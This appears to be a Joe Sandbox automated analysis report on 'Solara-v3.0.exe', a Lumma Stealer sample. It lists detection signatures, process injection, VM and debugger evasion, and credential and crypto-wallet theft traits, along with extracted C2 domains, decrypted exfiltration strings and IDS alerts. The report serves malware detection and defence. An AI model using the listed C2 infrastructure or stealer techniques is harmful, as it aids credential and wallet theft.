Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara-v3.0.exe

Overview

General Information

Sample name:Solara-v3.0.exe
Analysis ID:1581538
MD5:ac461b5d5ac030c7cc5c2f48efc44668
SHA1:86ed7c32e2539962ad29e046775025d9ec6ffdd6
SHA256:65f1f08a9fbd495e5544503df844e89d6ea7fdcad4a5cb56236fc10b624173be
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Solara-v3.0.exe (PID: 5004 cmdline: "C:\Users\user\Desktop\Solara-v3.0.exe" MD5: AC461B5D5AC030C7CC5C2F48EFC44668)
    • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara-v3.0.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\Solara-v3.0.exe" MD5: AC461B5D5AC030C7CC5C2F48EFC44668)
    • Solara-v3.0.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\Solara-v3.0.exe" MD5: AC461B5D5AC030C7CC5C2F48EFC44668)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["screwamusresz.buzz", "mindhandru.buzz", "inherineau.buzz", "cashfuzysao.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "yau6Na--899083440"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.2.Solara-v3.0.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  4.2.Solara-v3.0.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:59.800180+010020283713Unknown Traffic192.168.2.54970823.55.153.106443TCP
                    2024-12-28T02:55:02.189349+010020283713Unknown Traffic192.168.2.549709104.21.66.86443TCP
                    2024-12-28T02:55:04.234024+010020283713Unknown Traffic192.168.2.549710104.21.66.86443TCP
                    2024-12-28T02:55:06.674165+010020283713Unknown Traffic192.168.2.549711104.21.66.86443TCP
                    2024-12-28T02:55:08.988622+010020283713Unknown Traffic192.168.2.549712104.21.66.86443TCP
                    2024-12-28T02:55:11.790231+010020283713Unknown Traffic192.168.2.549713104.21.66.86443TCP
                    2024-12-28T02:55:14.249228+010020283713Unknown Traffic192.168.2.549714104.21.66.86443TCP
                    2024-12-28T02:55:16.798762+010020283713Unknown Traffic192.168.2.549719104.21.66.86443TCP
                    2024-12-28T02:55:20.536647+010020283713Unknown Traffic192.168.2.549727104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:55:02.927391+010020546531A Network Trojan was detected192.168.2.549709104.21.66.86443TCP
                    2024-12-28T02:55:05.008074+010020546531A Network Trojan was detected192.168.2.549710104.21.66.86443TCP
                    2024-12-28T02:55:21.336316+010020546531A Network Trojan was detected192.168.2.549727104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:55:02.927391+010020498361A Network Trojan was detected192.168.2.549709104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:55:05.008074+010020498121A Network Trojan was detected192.168.2.549710104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.703572+010020585721Domain Observed Used for C2 Detected192.168.2.5496141.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.846935+010020585761Domain Observed Used for C2 Detected192.168.2.5503521.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.993945+010020585781Domain Observed Used for C2 Detected192.168.2.5555041.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.422764+010020585801Domain Observed Used for C2 Detected192.168.2.5567621.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:56.855361+010020585821Domain Observed Used for C2 Detected192.168.2.5497761.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:56.997814+010020585841Domain Observed Used for C2 Detected192.168.2.5574311.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.140993+010020585861Domain Observed Used for C2 Detected192.168.2.5577001.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.283504+010020585881Domain Observed Used for C2 Detected192.168.2.5554781.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:54:57.564017+010020585901Domain Observed Used for C2 Detected192.168.2.5617621.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:55:07.625903+010020480941Malware Command and Control Activity Detected192.168.2.549711104.21.66.86443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-28T02:55:00.570475+010028586661Domain Observed Used for C2 Detected192.168.2.54970823.55.153.106443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://lev-tolstoi.com/pAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/mAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/iAvira URL Cloud: Label: malware
                    Source: https://scentniej.buzz/api0Avira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/wAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaocAvira URL Cloud: Label: malware
                    Source: https://appliacnesot.buzz/apiAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/apiifaf)Avira URL Cloud: Label: malware
                    Source: https://cashfuzysao.buzz/apiBAvira URL Cloud: Label: malware
                    Source: https://inherineau.buzz/apiAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/api2Y61Avira URL Cloud: Label: malware
                    Source: https://hummskitnj.buzz/apiAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "mindhandru.buzz", "inherineau.buzz", "cashfuzysao.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "yau6Na--899083440"}
                    Multi AV Scanner detection for submitted file
                    Source: Solara-v3.0.exeReversingLabs: Detection: 36%
                    Source: Solara-v3.0.exeVirustotal: Detection: 50%Perma Link
                    Machine Learning detection for sample
                    Source: Solara-v3.0.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString decryptor: yau6Na--899083440
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00414E25 CryptUnprotectData,4_2_00414E25
                    Source: Solara-v3.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB1FE9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CB1F38 FindFirstFileExW,0_2_00CB1F38
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CB1FE9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CB1F38 FindFirstFileExW,3_2_00CB1F38
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h4_2_0043F040
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h4_2_004400C0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2]4_2_0043D0D9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea eax, dword ptr [esi+00003763h]4_2_0040C08B
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ebx, word ptr [esi]4_2_0040A8B0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h4_2_0043F150
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov word ptr [ecx], dx4_2_0043D9C1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea edx, dword ptr [eax-00001099h]4_2_0043B1D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah4_2_0043FB10
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah4_2_0043FB10
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]4_2_0040CC75
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h4_2_004404D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea ecx, dword ptr [eax+000071B9h]4_2_00426520
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]4_2_00423675
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax]4_2_00423675
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042B841
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov word ptr [eax], cx4_2_0042904E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]4_2_00424060
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax]4_2_00424060
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then add ecx, edi4_2_0042B00F
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+esi*2]4_2_0043E820
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]4_2_0043E820
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]4_2_0043E820
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]4_2_0043E820
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h4_2_0043B8A0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]4_2_0040C942
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_00422140
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea eax, dword ptr [esi+00003763h]4_2_0040C158
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea ecx, dword ptr [eax+00000960h]4_2_0041C119
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]4_2_0043E920
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]4_2_0043E920
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]4_2_0043E920
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_00419930
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]4_2_00419930
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]4_2_00419930
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]4_2_0043E9D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]4_2_0043E9D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]4_2_0043E9D0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h4_2_004291B1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]4_2_00426990
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h4_2_004291B1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]4_2_00429A43
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h4_2_00428A4D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]4_2_0043EA60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]4_2_0043EA60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]4_2_0043EA60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h4_2_00429266
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00420A20
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]4_2_0040DA8B
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h4_2_00425A90
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]4_2_0040A2A6
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov word ptr [ecx], dx4_2_0043DB39
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea edx, dword ptr [eax+00000960h]4_2_0041C3F4
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]4_2_00423C40
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax]4_2_00423C40
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]4_2_0043B450
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h4_2_0043F450
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then push eax4_2_0043DC5E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh4_2_00440400
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_00407410
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_00407410
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov dword ptr [edi], 60296828h4_2_00424CCD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [ebx+eax*2]4_2_00424CCD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov dword ptr [esp+04h], ebx4_2_0042B48C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then lea ecx, dword ptr [eax-000037DBh]4_2_00409570
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042BD77
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then jmp edi4_2_0040A533
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]4_2_004285E1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h4_2_004285E1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]4_2_0042D5E6
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]4_2_0043CDF0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then add eax, 10h4_2_004195FD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edi, word ptr [ecx]4_2_0041BD8F
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_00408E50
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h4_2_00440650
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00421E60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00434E60
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]4_2_00429630
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042BE3B
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]4_2_00423EC0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax]4_2_00423EC0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]4_2_004386C0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042BE86
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h4_2_00415E8C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042BE9D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h4_2_00415F4C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]4_2_00425770
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h4_2_00416777
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h4_2_0043FF00
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then add eax, 10h4_2_004195FD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+esi*2]4_2_0043E710
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]4_2_0043E710
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]4_2_0043E710
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]4_2_0043E710
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_0041B729
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00429F80
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h4_2_0043F780
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]4_2_004177AD

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.5:55504 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.5:50352 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.5:57431 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.5:61762 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.5:49776 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.5:55478 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.5:49614 -> 1.1.1.1:53
